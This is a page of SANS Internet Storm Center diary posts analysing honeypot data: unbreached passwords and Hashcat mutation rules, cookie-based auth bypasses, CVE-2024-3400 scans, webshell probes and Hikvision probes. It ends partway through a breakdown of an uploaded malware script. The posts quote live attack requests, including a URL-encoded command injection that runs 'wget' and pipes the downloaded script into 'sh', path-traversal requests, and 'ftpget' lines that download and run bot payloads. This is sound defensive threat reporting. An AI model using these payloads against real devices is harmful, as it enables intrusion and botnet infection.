Tag Archives: Security

[Guest Diary] Comparing Honeypot Passwords with HIBP, (Wed, Oct 1st)

This post was originally published on this site

[This is a Guest Diary by Draden Barwick, an ISC intern as part of the SANS.edu Bachelor's Degree in Applied Cybersecurity (BACS) program [1].]

DShield Honeypots are constantly exposed to the internet and inundated with exploit traffic, login attempts, and other malicious activity. Analyzing the logged password attempts can help identify what attackers are targeting. To go through these passwords, I have created a tool that leverages HaveIBeenPwned’s (HIBP’s) API to flag passwords that haven’t appeared in any breaches.

Purpose

Identifying passwords that haven’t been seen in known breaches is useful because it can indicate additional planning and help identify patterns in these less common passwords. Anyone that operates a honeypot (and receives a lot of data on attempted use of passwords in plaintext) could benefit from this project as an additional starting point for investigations.

Development

HaveIBeenPwned maintains a large database of breached passwords and offers an API to tell if a given password has been compromised. This is done by making a request to “https://api.pwnedpasswords.com/range/#####”, where the “#####” part is the first 5 characters (prefix) of the SHA1 hash of the tested password. The site returns a list of the last 35 characters (suffix) of every password hash in the database that starts with the provided prefix, and each entry includes a count of how many times the corresponding password has been seen in breaches. Because only the prefix is sent, nobody can learn the full hash of the password we are looking for from the request alone. While this consideration is not important for our use with the DShield honeypots (as all passwords seen are publicly uploaded), it is important to understand because HIBP does not allow for searching with the full hash directly [2].
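To make the prefix/suffix split concrete, here is a minimal Python sketch. The helper name split_sha1 is made up for illustration and is not taken from the project's code; only the URL format comes from the description above.

```python
import hashlib


def split_sha1(password: str) -> tuple[str, str]:
    """Return (prefix, suffix) of the uppercase SHA1 hex digest.

    The 5-character prefix is what gets sent to the API; the
    35-character suffix is only compared locally against the response.
    """
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


prefix, suffix = split_sha1("password")
# URL that would be requested for this password (no request is made here).
range_url = f"https://api.pwnedpasswords.com/range/{prefix}"
```

For the string "password", the prefix is 5BAA6 and the remaining 35 characters never leave the local machine.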

To gather a list of all passwords my honeypot has gathered, I used JQ to parse the cowrie.json files located in the /srv/cowrie/var/log/cowrie directory. This command matches on any login failures or successes, and returns the password field from matching entries:

jq -r 'select(.eventid=="cowrie.login.failed" or .eventid=="cowrie.login.success") | [.password] | @tsv' /srv/cowrie/var/log/cowrie/cowrie.json* 

To extend this, we can remove duplicates using sort and uniq and save the unique passwords to a file:

jq -r 'select(.eventid=="cowrie.login.failed" or .eventid=="cowrie.login.success") | [.password] | @tsv' /srv/cowrie/var/log/cowrie/cowrie.json* | sort | uniq > ~/uniquepass.txt

As of writing, this took the number of passwords from 51,601 to 16,210 unique passwords.
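For readers who would rather stay in Python, the same filtering and de-duplication could be sketched roughly as follows. This is an illustrative equivalent of the jq pipeline, not part of the published tool; the function name and the choice to silently skip unparsable lines are assumptions.

```python
import json

# Event IDs matched by the jq filter above.
LOGIN_EVENTS = {"cowrie.login.failed", "cowrie.login.success"}


def unique_passwords(lines):
    """Collect the distinct passwords from an iterable of cowrie JSON log lines."""
    seen = set()
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # assumption: ignore truncated or corrupt lines
        if not isinstance(event, dict):
            continue
        if event.get("eventid") in LOGIN_EVENTS and "password" in event:
            seen.add(event["password"])
    return sorted(seen)
```

Passing an open log file (for example, open("cowrie.json")) as lines would yield the same kind of list that sort | uniq produces, apart from the escaping that jq's @tsv applies to tabs and backslashes.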

Now that we have a list of unique passwords, the next steps are to: read the created password file, take the SHA1 hash of each line, query the API for the hash prefix, and check for the hash suffix in the results.

To accomplish this, I created a Python script that utilizes one input file and two output files. The input file has a list of passwords to check with one entry per line. One output file stores all passwords that have been checked, the SHA1 hash, and how many times HIBP has seen the password (this file is a CSV used to avoid checking a password in the input file if it has been checked before). The other output file stores the plaintext of any password never seen by HIBP. The command line usage looks like this:

python3 queryHIBP.py uniquepass.txt passwordResults.csv unseenPasswords.txt

This resulted in the identification of 1,196 passwords that HIBP has not seen.

Code Breakdown

The code, available on GitHub [3], has thorough commenting but we will examine some parts here to gain a deeper understanding of how it functions.

In Figure 1, we can see the section of code that handles reading the results file that includes all passwords we have searched for. This is expected to be formatted as a CSV file with a header of “password,sha1,count”. As explained above, this helps avoid checking passwords unnecessarily.

The code opens the file with csv.DictReader, checks for “password” in the header, then uses a for loop to go through all of the rows to pull non-empty passwords and add them to a set. The set is returned at the end of the function.

 
Figure 1: Code used to read all previously checked passwords.
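A function along the lines described for Figure 1 might look like the sketch below. It is reconstructed from the prose description only, so the function name and the exact handling of a missing header are assumptions; the actual code is in the repository [3].

```python
import csv


def read_checked_passwords(rows):
    """Return the set of passwords already present in the results CSV.

    rows is any iterable of CSV lines, such as an open file. The header
    is expected to be "password,sha1,count".
    """
    checked = set()
    reader = csv.DictReader(rows)
    # No header, or no "password" column: treat as nothing checked yet.
    if not reader.fieldnames or "password" not in reader.fieldnames:
        return checked
    for row in reader:
        password = row.get("password")
        if password:  # skip empty entries
            checked.add(password)
    return checked
```

With a real file this would be called as read_checked_passwords(open("passwordResults.csv", newline="")).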

 

In Figure 2, we can see the code used to make API requests and handle a common error. First, a loop is established and the API request is made. Second, we check for a 429 response code which means there were too many requests. If there was a 429 error, HIBP will add a “Retry-After” header which lets us know how long to wait before trying again. The user agent is specified elsewhere as “PasswordCheckingProject” because HIBP states that “A missing user agent will result in an HTTP 403 response” [4].


Figure 2: Code used to make API requests and handle expected 429 errors.
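The 429 handling can be illustrated without touching the network. In this sketch, fetch is a hypothetical zero-argument callable standing in for the real HTTP request; it returns (status_code, headers, body). The function name and the default wait are likewise assumptions and are not taken from the script.

```python
import time


def get_with_rate_limit(fetch, max_retries=3, default_wait=1, sleep=time.sleep):
    """Call fetch() until it returns a non-429 response or retries run out."""
    for attempt in range(max_retries + 1):
        status, headers, body = fetch()
        if status != 429:
            return status, body
        if attempt == max_retries:
            break  # avoid an endless loop of 429 responses
        try:
            # Retry-After is expected to hold a number of seconds.
            wait = int(headers.get("Retry-After", default_wait))
        except ValueError:
            wait = default_wait
        sleep(wait)
    raise RuntimeError("still rate limited after retries")
```

Passing sleep as a parameter keeps the retry logic testable without actually waiting.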

 

Figure 3 shows the behavior for handling additional errors and normal function. Firstly, “resp.raise_for_status” is called which would raise an exception if there were an error with the HTTP request. If there’s no error, we simply iterate through all lines of the response to save the hash suffix and count in a dictionary, then return it. If an exception is raised, we increment an “attempt” variable which lets us cap the number of retries which is set to three by default. If the max is hit here, the code will print an error message indicating what prefix was being checked and exit. If there are more retries remaining, the script will wait 5 seconds before continuing. Figure 2 has a similar check for max retries to avoid a potential infinite loop of 429 errors.


Figure 3: Code used to store & return request results or deal with continued/unexpected errors.
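The parsing step described for Figure 3 is small enough to sketch in a few lines. The range API returns one "SUFFIX:COUNT" pair per line; the function names below are illustrative, and the counts in the usage example are made up.

```python
def parse_range_response(body):
    """Turn the text of a range response into a {suffix: count} dictionary."""
    counts = {}
    for line in body.splitlines():
        suffix, sep, count = line.strip().partition(":")
        if sep and count.isdigit():
            counts[suffix.upper()] = int(count)
    return counts


def breach_count(suffix, counts):
    """Return how often a suffix was seen, or 0 if it is not in the response."""
    return counts.get(suffix.upper(), 0)


# Usage with a fabricated two-line response body:
example = parse_range_response(
    "1E4C9B93F3F0682250B6CF8331B7EE68FD8:42\r\n"
    "0018A45C4D1DEF81644B54AB7F969B88D65:3\r\n"
)
```

A password whose suffix yields a count of 0 here is one that would be written to the unseen passwords file.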

 

Implementation

To download the project and try it out with some test data, one can run the following:

git clone https://github.com/MeepStryker/queryHIBP.git
cd queryHIBP
python3 queryHIBP.py ./sampleInput.txt ./passwordResults.csv ./unseenPasswords.txt

As the script runs, it will print out each unseen password identified and a short summary at the end as seen in Figure 4.


Figure 4: Script output using real data.

 

Automation

To automate the use of this tool, I created a cron job to run the JQ command & output results to a file and made another job to run the script with the needed arguments. These are set to run daily with the script running 5 minutes after the JQ command. This uses the following crontab entries:

0 17 * * * jq -r 'select(.eventid=="cowrie.login.failed" or .eventid=="cowrie.login.success") | [.password] | @tsv' /srv/cowrie/var/log/cowrie/cowrie.json* | sort | uniq > ~/uniquepass.txt

5 17 * * * python3 ~/queryHIBP.py ~/uniquepass.txt ~/passwordResults.csv ~/unseenPasswords.txt

The script runs 5 minutes after the JQ command to ensure there is more than enough time to create the input file. Since there is a limit on how long logs are retained, there are no concerns about this ever starting to take longer.

I chose this method over adding parsing functionality into the script out of convenience. Parsing the logs in the script would require additional logic and either hardcoding locations to check for logs or dealing with more arguments. As it is designed, anyone can easily plug in a list of passwords without having to worry about many command line options or editing the script.

Results

The script accurately provides information on passwords that HaveIBeenPwned has not seen in prior breaches. While there were more unseen passwords than one may expect (1,196 or ~7.4% of all unique passwords as of writing), it provides interesting insight into what some actors may be targeting. The results also reveal patterns for password mutations that are being leveraged for access attempts:

deploy12345
deploy123456
deploy1234567
deploy12345678
deploy@2022
deploy@2023
deploy@2025
deploy2025
deploy@321
deploypass
P@$$vords123
P@$sw0rd#
P4$$word!@#
P455wORd
P@55W0RD2004
Pa$$word2016!
pa33w0rd!@
Pa55w0rd@2021
passw0rd!@#$
pass@w0rd.12345
passwd@123!
PaSswORD@123
password@2!@
PaSswORd2021
password!2024
password!2025
Password43213
password!@#456

Password Patterns & Analysis

Analyzing the passwords seen in the above Results section can provide some insight into what techniques are being used to generate passwords.

Consider the above sample of results. Broadly speaking, this ‘deploy family’ of passwords was likely generated by starting with a base password of “deploy” and adding common modifiers to increase complexity. Seen here are good examples of the simplest ones: adding the year (with an @ sign in this case) and adding sequential numbers.

The rest of the entries above are all based on the word ‘password’. These are more complex than what we saw with ‘deploy’. Below are three entries, a plain explanation of a Hashcat rule that could be used to come up with it, and a sample implementation of the rule:

  • P4$$word!@#
    • Capitalize the first letter, replace a’s with 4’s, replace s’s with $’s, add !@# to end – c sa4 ss$ $! $@ $#
  • P@55W0RD2004
    • Replace a’s with @’s, replace s’s with 5’s, replace o’s with 0’s, capitalize all letters, and add a year to the end – sa@ ss5 so0 u $2 $0 $0 $4 (the substitutions come before u because they are case-sensitive and would not match once the word is uppercased)
  • Password!2024
    • Capitalize the first letter, add ! and a year to the end – T0 $! $2 $0 $2 $4

Both Hashcat and John the Ripper can make these modifications by using rules to augment password lists. The rules allow various changes to input such as replacing or swapping certain characters with others. Note that while much of the rules syntax between these tools is similar, there are some differences [5].
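To see how such rules transform a base word, the sketch below re-implements a handful of Hashcat rule functions in Python: c (capitalize), u (uppercase), TN (toggle case at position N), sXY (replace X with Y), and $X (append X). It is a toy interpreter for illustration only, not Hashcat's engine, and it splits rules on whitespace, so it cannot express appending a space.

```python
def apply_rule(word, rule):
    """Apply a whitespace-separated subset of Hashcat rule functions to word."""
    for op in rule.split():
        if op == "c":
            # Capitalize the first character, lowercase the rest.
            word = word[:1].upper() + word[1:].lower()
        elif op == "u":
            word = word.upper()
        elif op[0] == "s" and len(op) == 3:
            # sXY: case-sensitive replacement of every X with Y.
            word = word.replace(op[1], op[2])
        elif op[0] == "$" and len(op) == 2:
            word += op[1]
        elif op[0] == "T" and len(op) == 2 and op[1].isdigit():
            pos = int(op[1])
            if pos < len(word):
                word = word[:pos] + word[pos].swapcase() + word[pos + 1:]
        else:
            raise ValueError(f"unsupported rule function: {op}")
    return word


candidates = [
    apply_rule("password", "c sa4 ss$ $! $@ $#"),
    apply_rule("password", "sa@ ss5 so0 u $2 $0 $0 $4"),
    apply_rule("password", "T0 $! $2 $0 $2 $4"),
]
```

Because sXY is case-sensitive, the order of functions matters: in this sketch, applying u first leaves no lowercase letters for sa@ to match, so "u sa@" on "password" simply gives "PASSWORD".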

Looking through the unseen passwords, we can also see more specific targets such as Elasticsearch, Oracle, PostgreSQL, and Ubuntu. Figure 5 shows some of these passwords, which use the same kind of modifications mentioned earlier, and illustrates the relative difference in frequency.


Figure 5: Passwords related to specific services/platforms.

Overall Takeaway

While a good amount of manual analysis will still be required, these results can provide a lot of value and the script helps cut down on time. We can learn more about common password modifications to avoid and even get an idea of the relative interest of different targets. In Figure 5 alone, we can see that PostgreSQL may be roughly two times more likely to be targeted than Elasticsearch, with newer installations being targeted in particular.

For future work, I would add a feature to recheck the known unseen passwords to identify if they happen to be newly breached.

Additionally, I may consider adding two features for convenience. The first would be re-sorting the unseen file since it is append only. The second would be parsing features to simplify automation and allow the script to provide more functionality for end users.

[1] https://www.sans.edu/cyber-security-programs/bachelors-degree/
[2] https://haveibeenpwned.com/API/v3#PwnedPasswords
[3] https://github.com/MeepStryker/queryHIBP
[4] https://haveibeenpwned.com/API/v3#UserAgent
[5] https://hashcat.net/wiki/doku.php?id=rule_based_attack#compatibility_with_other_rule_engines

 


Jesse La Grew
Handler

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

"user=admin". Sometimes you don't even need to log in., (Tue, Sep 30th)

One of the common infosec jokes is that sometimes you do not need to "break" an application; you just have to log in. This is often the case for weak default passwords, which are common in IoT devices. However, an even easier method is to tell the application who you are. This does not even require a password! One of the sad recurring vulnerabilities is an HTTP cookie that contains the user's username or userid.

I took a quick look at our honeypot for cookies matching this pattern. Here is a selection:

Cookie: uid=1
Cookie: user=admin
Cookie: O3V2.0_user=admin
Cookie: admin_id=1; gw_admin_ticket=1
Cookie: RAS_Admin_UserInfo_UserName=admin
Cookie: CMX_SAVED_ID=zero; CMX_ADMIN_ID=science; CMX_ADMIN_NM=liquidworm; CMX_ADMIN_LV=9; CMX_COMPLEX_NM=ZSL; CMX_COMPLEX_IP=2.5.1.
Cookie: admin_id=1; gw_admin_ticket=1;
Cookie: ASP.NET_SessionId=; sid=admin

These are listed by frequency, with "uid=1" being the most commonly used value.
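A rough way to hunt for this pattern in honeypot logs is to flag cookies whose name looks like an identity field and whose value is a trivially guessable identity. The regular expressions below are assumptions chosen to match most of the samples above; they are not the query used for this diary, and they will miss cases such as CMX_ADMIN_ID=science.

```python
import re

# Heuristics only: cookie names ending in an identity-like word, and
# values that are "admin", "root", or a short numeric ID.
SUSPECT_NAME = re.compile(r"(user(name)?|uid|admin_id|sid)$", re.IGNORECASE)
SUSPECT_VALUE = re.compile(r"^(admin|root|\d{1,4})$", re.IGNORECASE)


def parse_cookie_header(value):
    """Split a Cookie header value into (name, value) pairs."""
    pairs = []
    for part in value.split(";"):
        name, sep, val = part.strip().partition("=")
        if sep and name:
            pairs.append((name, val))
    return pairs


def identity_cookies(value):
    """Return the cookie pairs that look like a client-asserted identity."""
    return [
        (name, val)
        for name, val in parse_cookie_header(value)
        if SUSPECT_NAME.search(name) and SUSPECT_VALUE.match(val)
    ]
```

For example, identity_cookies("admin_id=1; gw_admin_ticket=1;") returns only the admin_id pair, while an ordinary random session token is not flagged.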

Let's see if we can identify some of the targeted vulnerabilities.

For the first one (uid=1), the URL hit is:

/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<some shell command>

CVE-2024-3721: This is a relatively new (2024) OS command injection vulnerability in certain TBK DVRs.

The second one is also an IoT-style issue:

POST /goform/set_LimitClient_cfg
User-Agent: Mozilla/5.0 (makenoise@tutanota.de)
Content-Type: application/x-www-form-urlencoded
Content-Length: 113
Cookie: user=admin

time1=00:00-00:00&time2=00:00-00:00&mac=%3Bwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.xqe.sh%7Csh%26echo%20

CVE-2023-26801: Another "classic" IoT issue. This one affects LB-LINK wireless routers. This vulnerability may never have been patched, but I'm unsure how popular these routers are.
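The injected command is easier to read once the form body is URL-decoded. A short Python sketch using only the standard library, with the body copied from the request above:

```python
from urllib.parse import parse_qs

# POST body exactly as captured by the honeypot.
body = (
    "time1=00:00-00:00&time2=00:00-00:00"
    "&mac=%3Bwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.xqe.sh%7Csh%26echo%20"
)

fields = parse_qs(body, keep_blank_values=True)
mac_value = fields["mac"][0]
print(repr(mac_value))
```

The decoded "mac" value starts with a semicolon, which ends whatever command the firmware builds around the parameter, and then pipes a downloaded script into sh.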

The cookie "O3V2.0_user=admin" is associated with a similar, but more recent issue affecting Tenda O3V2 wireless access points. Wireless internet service providers (WISPs) often use these outdoor access points. The vulnerability is similar to the issue above in that a POST request to "/goform/setPingInfo" is used to carry an OS command injection payload. Common URL schemes like "/goform" point to similar firmware and likely similar vulnerabilities.

"admin_id=1; gw_admin_ticket=1": Google returned a reference to a post in Chinese, implying that this is a vulnerability in "Qi'anxin VPN" that allows arbitrary account and password modification.

"RAS_Admin_UserInfo_UserName=admin" affects the "Comai RAS System" software for managing remote desktop environments. Most references to the vulnerability are in Chinese. I did not see a CVE number, but the vulnerability appears to be three years old.

"CMX_SAVED_ID=zero; CMX_ADMIN_ID=science": No CVE, and there is no fix for this issue, which was discovered in 2021. It only affects a biometric access system (COMMAX) 🙁. See https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php.

So in short: Yes… These vulnerabilities are out there, and they are exploited.


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu


Apple Patches Single Vulnerability CVE-2025-43400, (Mon, Sep 29th)

It is typical for Apple to release a ".0.1" update soon after releasing a major new operating system. These updates typically fix various functional issues, but this time, they also fix a security vulnerability. The security vulnerability not only affects the "26" releases of iOS and macOS, but also older versions. Apple released fixes for iOS 18 and 26, as well as for macOS back to Sonoma (14). Apple also released updates for WatchOS and tvOS, but these updates do not address any security issues. For visionOS, updates were only released for visionOS 26.

Increase in Scans for Palo Alto Global Protect Vulnerability (CVE-2024-3400), (Mon, Sep 29th)

We are all aware of the abysmal state of security appliances, no matter their price tag. Every so often, we see an increase in attacks against some of these vulnerabilities, trying to mop up systems missed in earlier exploit waves. Currently, one source in particular, 141.98.82.26, is looking to exploit systems vulnerable to CVE-2024-3400. The exploit is rather straightforward. Palo Alto never considered it necessary to validate the session ID. Instead, they use the session ID "as is" to create a session file. The exploit is well explained by watchTowr [1].

First, we see a request to upload a file:

POST /ssl-vpn/hipreport.esp
Host: [honeypot ip]:8080
User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Content-Length: 174
Content-Type: application/x-www-form-urlencoded
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/33EGKkp7zRbFyf06zCV4mzq1vDK.txt;
Accept-Encoding: gzip

user=global&portal=global&authcookie=e51140e4-4ee3-4ced-9373-96160d68&domain=global&computer=global&client-ip=global&client-ipv6=global&md5-sum=global&gwHipReportCheck=global

Next, a request to retrieve the uploaded file:

GET /global-protect/portal/images/33KFpJLBHsMmkNuxs7pqpGOIIgF.txt
host: [honeypot ip]
user-agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
connection: close
accept-encoding: gzip

This will return a "403" error if the file exists, and a "404" error if the upload failed. It will not execute code. The content of the file is a standard Global Protect session file, and will not execute. A follow-up attack would upload the file to a location that leads to code execution. 
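On the defensive side, the upload request stands out in logs because a session ID has no reason to contain path components. A minimal detection sketch in Python follows; the function names are hypothetical, and checking for ".." path segments is just one simple heuristic.

```python
def sessid_from_cookie(cookie_header):
    """Extract the SESSID value from a Cookie header value, if present."""
    for part in cookie_header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep and name == "SESSID":
            return value
    return None


def looks_like_traversal(sessid):
    """Flag session IDs containing a '..' path segment."""
    if sessid is None:
        return False
    segments = sessid.replace("\\", "/").split("/")
    return ".." in segments


cookie = (
    "SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/"
    "33EGKkp7zRbFyf06zCV4mzq1vDK.txt;"
)
suspicious = looks_like_traversal(sessid_from_cookie(cookie))
```

Here suspicious is True for the cookie captured above, while a plain token-style session ID is not flagged.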

The same source is also hitting the URL "/Synchronization" on our honeypots. Google AI associates this with a Global Protect vulnerability discovered last week, but this appears to be a hallucination.  

[1] https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu


New tool: convert-ts-bash-history.py, (Fri, Sep 26th)

In SANS FOR577[1], we talk about timelines on day 5, both filesystem and super-timelines. But sometimes I want something quick and dirty: rather than fire up plaso just to create a timeline of .bash_history data, it is nice to be able to parse the files directly and, if timestamps are enabled, see them in a human-readable form. I've had some students in class write scripts to do this and even had one promise to share it with me after class, but I never ended up getting it, so I decided to write my own. This script takes the path to 1 or more .bash_history files and returns a PSV (pipe separated values) list (on stdout) in the form: <filename>|<datetime>|<command> where the <datetime> is in ISO-8601 format (the one true date time format, but only to 1 sec resolution since that is the best that the .bash_history file will give us). In a future version I will probably offer an option to change from PSV to CSV.
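The core idea is simple enough to sketch in a few lines of Python. This is not the convert-ts-bash-history.py script itself, only an illustration of the technique: when timestamps are enabled, bash writes a "#<epoch seconds>" line before each command. Rendering the time in UTC and leaving the datetime field empty for commands without a timestamp are assumptions made here.

```python
from datetime import datetime, timezone


def history_to_psv(filename, lines):
    """Convert .bash_history lines to '<filename>|<datetime>|<command>' rows."""
    rows = []
    stamp = ""  # stays empty until the first timestamp line is seen
    for raw in lines:
        line = raw.rstrip("\n")
        if line.startswith("#") and line[1:].isdigit():
            moment = datetime.fromtimestamp(int(line[1:]), tz=timezone.utc)
            stamp = moment.strftime("%Y-%m-%dT%H:%M:%SZ")
            continue
        if line:
            # Continuation lines of a multi-line command keep the last stamp.
            rows.append(f"{filename}|{stamp}|{line}")
    return rows
```

Calling "\n".join(history_to_psv(path, open(path))) would give output in the PSV shape described above.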

Webshells Hiding in .well-known Places, (Thu, Sep 25th)

Every so often, I see requests for files in .well-known recorded by our honeypots. As an example:

GET /.well-known/xin1.php?p
Host: [honeypot host name]

The file names indicate that they are likely looking for webshells. In my opinion, the reason they are looking in .well-known is that this makes a decent place to hide webshells without having them overwritten by an update to the site.

The .well-known directory is meant to be used for various informational files [1], and for example, for ACME TLS challenges. As a result, it is the only directory or file starting with "." that must be accessible via the web server. But it is also "hidden" to Unix command line users. I have written about the various legitimate uses of .well-known before [2].

We also see some requests for PHP files in the acme-challenge and pki-validation subdirectories.

Here are some of the more common, but not "standard" URLs in .well-known hit in our honeypots:

/.well-known/pki-validation/about.php
/.well-known/about.php
/.well-known/acme-challenge/cloud.php
/.well-known/acme-challenge/about.php
/.well-known/pki-validation/xmrlpc.php
/.well-known/acme-challenge/index.php
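Since nothing under .well-known should normally be a server-side script, a simple log filter can surface these probes (or, on your own servers, planted files). The Python sketch below is one possible heuristic; the list of extensions is an assumption and can be extended.

```python
from urllib.parse import urlsplit

# Assumed set of script extensions worth flagging.
SCRIPT_EXTENSIONS = (".php", ".phtml", ".jsp", ".asp", ".aspx")


def is_wellknown_script(url):
    """True if the request path is a script-like file under /.well-known/."""
    path = urlsplit(url).path.lower()
    return path.startswith("/.well-known/") and path.endswith(SCRIPT_EXTENSIONS)


requests_seen = [
    "/.well-known/xin1.php?p",
    "/.well-known/acme-challenge/cloud.php",
    "/.well-known/security.txt",
    "/index.php",
]
flagged = [url for url in requests_seen if is_wellknown_script(url)]
```

Only the first two entries are flagged; security.txt and scripts outside .well-known pass through.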

 

 

[1] https://datatracker.ietf.org/doc/html/rfc8615
[2] https://isc.sans.edu/diary/26564

 —
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu


Exploit Attempts Against Older Hikvision Camera Vulnerability, (Wed, Sep 24th)

I noticed a new URL showing up in our web honeypot logs, which looked a bit interesting:

/System/deviceInfo?auth=YWRtaW46MTEK

The full request:

GET /System/deviceInfo?auth=YWRtaW46MTEK
Host: 3.87.70.24
User-Agent: python-requests/2.32.4
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

The "auth" string caught my attention, in particular as it was followed by a base64 encoded string. The string decodes to admin:11.
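The decoding is easy to verify with Python's standard library:

```python
import base64

token = "YWRtaW46MTEK"
decoded = base64.b64decode(token).decode("ascii")

# Split into the two halves of the credential, ignoring the trailing newline.
username, _, password = decoded.rstrip("\n").partition(":")
print(repr(decoded), username, password)
```

The decoded string actually ends with a newline character ("admin:11\n"). That may suggest the value was originally produced by something like piping echo output into a base64 encoder, but that is speculation.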

This "auth" string has been around for a while for a number of Hikvision-related URLs. Until this week, the particular URL never hit our threshold to be included in our reports. So far, the "configurationFile" URL has been the most popular. It may give access to additional sensitive information.

 

Earliest Report  Most Recent Report  Total Number of Reports  URL
2018-08-18       2025-09-23          6720                     /System/configurationFile?auth=YWRtaW46MTEK
2017-12-14       2025-09-23          2293                     /Security/users?auth=YWRtaW46MTEK
2021-03-09       2025-09-23          2002                     /system/deviceInfo?auth=YWRtaW46MTEK
2020-09-25       2023-02-04          727                      /security/users/1?auth=YWRtaW46MTEK
2018-09-09       2025-09-23          445                      /onvif-http/snapshot?auth=YWRtaW46MTEK
2017-10-06       2017-10-06          6                        /Streaming/channels/1/picture/?auth=YWRtaW46MTEKYOBA
2025-04-09       2025-04-29          2                        /ISAPI/Security/users?auth=YWRtaW46MTEK

 

Some Googling leads to CVE-2017-7921 [1]. Hikvision's advisory is sparse and does not identify a particular vulnerable URL [2]. But this looks to me more like some brute forcing. The CVE-2017-7921 vulnerability is supposed to be some kind of backdoor (Hikvision's description of it as "privilege escalation" was considered euphemistic at the time). But I doubt the password is "11", and a typical Hikvision default password is much more complex ("123456" in the past).

We have written about Hikvision many times before; its cameras, as well as cameras from competitors like Dahua, are well known for their numerous security vulnerabilities, hard-coded "support passwords", and other issues. One issue with many of these cameras has been a limited user interface. The DVR used to collect footage from these cameras often only includes a mouse and an onscreen keyboard, making it difficult to select reasonable passwords. This attack may count on users setting a simple password like "11" as by default, only a numeric onscreen keyboard is displayed on some models.

Another issue is the use of credentials on the URL, which is discouraged as they tend to leak easily in logs. But it may be yet again a convenience decision as you are able to create hyperlinks that will log you in automatically.

 

[1] https://nvd.nist.gov/vuln/detail/cve-2017-7921
[2] https://www.hikvision.com/us-en/support/document-center/special-notices/privilege-escalating-vulnerability-in-certain-hikvision-ip-cameras/
 


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu


Exploring Uploads in a Dshield Honeypot Environment [Guest Diary], (Thu, Sep 18th)

[This is a Guest Diary by Nathan Smisson, an ISC intern as part of the SANS.edu BACS program]

The goal of this project is to test the suitability of various data entry points within the dshield ecosystem to determine which metrics are likely to yield consistently interesting results.  This article explores analysis of files uploaded to the cowrie honeypot server.  Throughout this project, a number of tools have been developed to aid in improving workflow efficiency for analysts conducting research using a cowrie honeypot.  Here, a relatively simple tool called upload-stats is used to enumerate basic information about the files in the default cowrie ‘downloads’ directory at /srv/cowrie/var/lib/cowrie/downloads.  This and other tools developed in this project are available for use or contribution at https://github.com/neurohypophysis/dshield-tooling.

The configuration of my honeypot is intentionally very typical, closely following the installation and setup guide on https://github.com/DShield-ISC/dshield/tree/main.  The node in use for the purposes of this article was set up on an EC2 instance in the AWS us-east-1 zone, which is old and very large, even by AWS standards.

Part 1: Identified Shell Script Investigation

The upload-stats tool works by enumerating some basic information about the files present in the downloads directory and printing it along with any corresponding information discovered in the honeypot event logs.  If the logs are still present on the system, it will automatically identify information such as source IP, time of upload, and other statistics that can aid in further exploration of interesting-looking files.
Given no arguments, the tool produces a quick summary of the files available on the system:

In this case, 21 of the files are reported as empty; if you’re following along, you may notice that the names of many such empty files are something short like tmp5wtvcehx.  When an upload is started, cowrie creates a temporary file, populates it with the contents of the uploaded file, and then renames it to the SHA hash of the result.  For empty files with temporary placeholder names, that likely means that the upload failed for some reason.

Among the top file types provided, we have a single file that was identified by the UNIX file utility as a Bash script.  As it turns out, this was not the only shell script among the files present in the directory at the time this command was run.  The reason that only one of them was identified as a shell script will be explored later in this article.  First, let’s take a look at the outlier.  Luckily it’s relatively short, so I can include the contents of the entire script here.

Fortunately for us, this script is very repetitive and easy to read, so let’s go line by line for one iteration of the pattern (which, I might add, could be much more concise had the actor used a for loop).

Line 1
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;

Each line of the script begins by attempting to change to one of several directories (cd /tmp || cd /var/run || cd /mnt || cd /root || cd /). This fallback sequence suggests a preference for a writable, low-monitoring location first (/tmp); the alternative directories are only tried if the prior ones fail, with the filesystem root as a last resort.

Line 2
ftpget -v -u anonymous -p anonymous -P 21 87.121.84.163 arm5 arm5;

What follows is a command to download an architecture-specific payload from the actor’s FTP server.  More specifically, the script as a whole, if executed (and assuming we have ftpget installed, which we do not) will download payloads for 14 different architectures, casting a pretty wide net.  The inclusion of the -v (verbose) switch indicates that the actor expects, or at least hopes for non-blind RCE in this context, though we can assume FTP server accesses from the victim would be visible to the actor if execution succeeded, regardless.

To be thorough, here are the targeted CPU architecture variants:
•    mips, mipsel (MIPS variants)
•    sh4 (SuperH architecture)
•    x86_64 (64-bit Intel/AMD)
•    arm6, arm, arm5, arm7 (various ARM versions)
•    i686, x86 (32-bit Intel/AMD)
•    powerpc, ppc4fp (PowerPC variants)
•    m68k (Motorola 68k series)
•    spc (Ambiguous; may refer to SPC-700, among others.  I’d have to ask the author of the malware for clarification)

An interesting list, to be sure.  After researching some of the more obscure variants, the underlying commonality seems to be targeting IoT/embedded/OT devices or (likely legacy) networking equipment.  It’s hard to say anything beyond that for certain, though many of these have much more limited applications than others (e.g., SuperH, Motorola 68000 series, and SPC vs x86_64).  Notably absent are any Apple chips or many of the modern chips used in Android handsets.  Given the types of devices used with some of these specialized hardware sets, the final payload is unlikely to attempt anything involving a heavy workload.
I also noted the use of the old plaintext FTP for payload transfer: old becomes new again.

Line 3
chmod 777 arm5; ./arm5 telnet;

